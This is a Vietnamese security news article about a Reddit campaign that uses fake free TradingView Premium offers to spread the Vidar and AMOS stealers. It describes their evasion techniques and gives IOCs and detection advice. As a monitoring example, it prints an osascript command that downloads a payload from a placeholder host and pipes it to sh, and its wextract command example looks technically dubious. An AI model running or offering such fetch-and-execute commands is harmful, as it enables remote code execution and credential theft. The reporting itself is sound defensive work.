Tấn công mạng nghiêm trọng: Mã độc Vidar, AMOS rò rỉ dữ liệu

Một chiến dịch tấn công mạng đang diễn ra sôi nổi trên nền tảng Reddit, sử dụng các bài đăng giả mạo hứa hẹn cung cấp quyền truy cập TradingView Premium miễn phí. Mục tiêu của chiến dịch này là phát tán hai họ mã độc stealer: mã độc Vidar trên hệ điều hành Windows và AMOS trên macOS.

Hoạt động độc hại này vẫn đang tiếp diễn, với các bài đăng mới liên tục xuất hiện ngay cả khi những bài cũ bị gỡ bỏ.

Chi tiết Chiến dịch Tấn công Lừa đảo

TradingView là một trong những nền tảng biểu đồ được sử dụng rộng rãi bởi các nhà giao dịch bán lẻ, nhà đầu tư tiền điện tử và những người đam mê ngoại hối. Gói đăng ký Premium của TradingView mở khóa các chỉ báo nâng cao và dữ liệu thị trường theo thời gian thực, nhưng đi kèm với một mức phí mà nhiều người dùng muốn tránh.

Kẻ đe dọa khai thác nhu cầu này bằng cách đăng bài trên nhiều subreddit – một số bị chiếm quyền, một số được tạo ra có chủ đích. Các bài đăng này cung cấp hướng dẫn từng bước chi tiết, dẫn dắt nạn nhân qua toàn bộ chuỗi lây nhiễm mà không gây ra nghi ngờ.

Các nhà phân tích từ Hexastrike đã truy tìm các vụ lây nhiễm mã độc stealer gần đây trở lại Reddit. Họ đã xác định một kẻ đe dọa duy nhất hoạt động trên ít nhất năm subreddit khác nhau.

Kẻ tấn công sử dụng các tài khoản Reddit đã cũ, được mua hoặc bị chiếm đoạt để tăng tính tin cậy. Điều đáng chú ý không phải là sự phức tạp về kỹ thuật mà là kỷ luật trong hoạt động của chúng.

• Các tên miền lưu trữ độc hại được thay đổi ngay khi bị gắn cờ.
• Bình luận cảnh báo từ người dùng thực bị xóa trong vòng vài phút.
• Các bài đăng có vẻ được tạo bằng mô hình ngôn ngữ lớn (LLM) để duy trì giọng điệu nhất quán.

Các subreddit như r/BitBullito và r/CryptoCurrencyDM chỉ có hai và 29 người đăng ký tương ứng, trong khi các tài khoản đăng bài lại có tuổi đời từ ba đến sáu năm. Điều này tạo ra sự hợp pháp giả tạo cho hoạt động tấn công mạng.

Ví dụ, một tài khoản là u/BroadDepartment573, sở hữu danh hiệu Reddit Four Year Club nhưng chỉ có duy nhất một bài đăng trong toàn bộ lịch sử của nó. Mỗi bài đăng đều tuân theo cùng một mẫu, tuyên bố phần mềm đã được kỹ thuật đảo ngược và tất cả các kiểm tra giấy phép đã bị loại bỏ.

Kỹ thuật Phân phối Mã độc

Các liên kết tải xuống riêng biệt được cung cấp cho Windows, macOS và macOS 15. Mức độ nhắm mục tiêu nền tảng này cho thấy kẻ tấn công hiểu rõ các hạn chế của Apple Gatekeeper trên macOS Sequoia, như được mô tả trong một bài viết từ Cybersecurity News.

Các payload được lưu trữ trên các trang web kinh doanh hợp pháp bị xâm nhập, điều này làm tăng thêm độ tin cậy cho các liên kết tải xuống độc hại. Đây là một chiến thuật phổ biến trong các cuộc tấn công mạng.

Kỹ thuật Né tránh Phát hiện trên Windows

Phình to Tệp tin và Độn Byte rỗng

Trên hệ điều hành Windows, tệp thực thi được giải nén bị phình to lên hơn 784 megabyte thông qua việc độn các byte rỗng (null-byte padding) trong phần tài nguyên PE của nó. Kích thước này được cố ý thiết lập để vượt quá giới hạn quét của nhiều phần mềm diệt virus.

Bên dưới phần độn này là một tệp cabinet tự giải nén dung lượng 44 kilobyte. Tệp này sẽ giải phóng một script batch có tên Receipt.gif. Mặc dù có phần mở rộng tệp ảnh, đây thực chất là một script bị che giấu (obfuscated) gồm 235 dòng.

Tái tạo Mã độc Vidar và Khóa giải nén

Script này có nhiệm vụ tập hợp lại mã độc Vidar infostealer từ các phân đoạn tệp bị chia nhỏ. Nó sử dụng kỹ thuật thay thế ký tự để đánh bại các phương pháp phát hiện dựa trên chữ ký, một kỹ thuật tinh vi để tránh bị phát hiện xâm nhập.

Mật khẩu của tệp lưu trữ – hoặc “github” hoặc “codeberg” – được đăng trực tiếp trong luồng Reddit. Cả hai tên này đều được chọn để gợi lên các nền tảng phát triển hợp pháp, nhằm giảm sự nghi ngờ từ phía nạn nhân trong chiến dịch tấn công mạng.

Mã độc AMOS trên macOS

Trên hệ điều hành macOS, bản tải xuống là một disk image. Khi được gắn, nó hiển thị với hình nền mang thương hiệu TradingView để bắt chước một trình cài đặt thực sự. Bên trong là một binary Mach-O nhỏ gọn dung lượng 217 kilobyte. Binary này sẽ giải mã mã độc AMOS stealer khi thực thi thông qua một vòng lặp XOR đa hình (polymorphic XOR loop).

Khi được thực thi, AMOS sẽ thu thập thông tin đăng nhập và cookie từ các trình duyệt như Chrome, Firefox, Safari, Brave, Edge và Opera. Nó cũng sao chép các tệp ví tiền điện tử từ Exodus, Electrum và MetaMask. Sau đó, tất cả dữ liệu này được gửi ra ngoài qua HTTP chỉ trong vài giây, dẫn đến tình trạng rò rỉ dữ liệu nhạy cảm.

Để hiểu rõ hơn về cách AMOS hoạt động, bạn có thể tham khảo bài viết về mã độc AMOS trên Cybersecurity News.

Chỉ số Nhận dạng Đe dọa (IOCs) và Khuyến nghị Phòng ngừa

Để tăng cường an ninh mạng, các tổ chức nên thực hiện các biện pháp phòng ngừa sau:

Chỉ số Nhận dạng Đe dọa (IOCs)

• Tên miền phân phối: Các tên miền lưu trữ payload độc hại (thường là các trang web kinh doanh hợp pháp bị xâm nhập).
• Phần mềm độc hại: Vidar infostealer (Windows), AMOS stealer (macOS).
• Tên tệp độc hại: Receipt.gif (script batch trên Windows).
• Kích thước tệp bất thường: Tệp thực thi Windows bị phình to lên hơn 784 MB bằng null-byte padding.
• Mật khẩu lưu trữ: “github”, “codeberg”.

Khuyến nghị Bảo mật

Thêm các tên miền phân phối đã xác định vào danh sách chặn của proxy web và DNS. Tìm kiếm các mẫu duyệt Reddit sau đó nhanh chóng tải xuống tệp ZIP lớn từ một tên miền không liên quan.

Trên Windows, cảnh báo khi wextract.exe khởi tạo cmd.exe với delayed variable expansion. Ví dụ về lệnh có thể bị giám sát:

wextract.exe /C:"C:\Path\To\Extracted\Files" /E:cmd.exe /K /Q /T:"C:\Path\To\Temp"

Trên macOS, giám sát các ứng dụng không có chữ ký gọi osascript hoặc thực hiện các nỗ lực xác thực thông tin đăng nhập dscl authonly không mong muốn. Một lệnh osascript đáng ngờ có thể trông như sau:

osascript -e 'do shell script "curl -s http://malicious.com/payload | sh"'

Bất kỳ ai có bất kỳ nghi ngờ nào về việc bị phơi nhiễm nên coi đó là một sự xâm nhập đã được xác nhận. Mật khẩu trình duyệt, cookie phiên và khóa ví tiền điện tử đều nên được coi là đã bị đánh cắp, dẫn đến nguy cơ rò rỉ dữ liệu nghiêm trọng.

Tải xuống phần mềm bẻ khóa vẫn là một trong những cách đáng tin cậy nhất mà các kẻ đe dọa tìm kiếm nạn nhân ngày nay. Việc áp dụng các biện pháp an toàn thông tin nghiêm ngặt là cực kỳ cần thiết.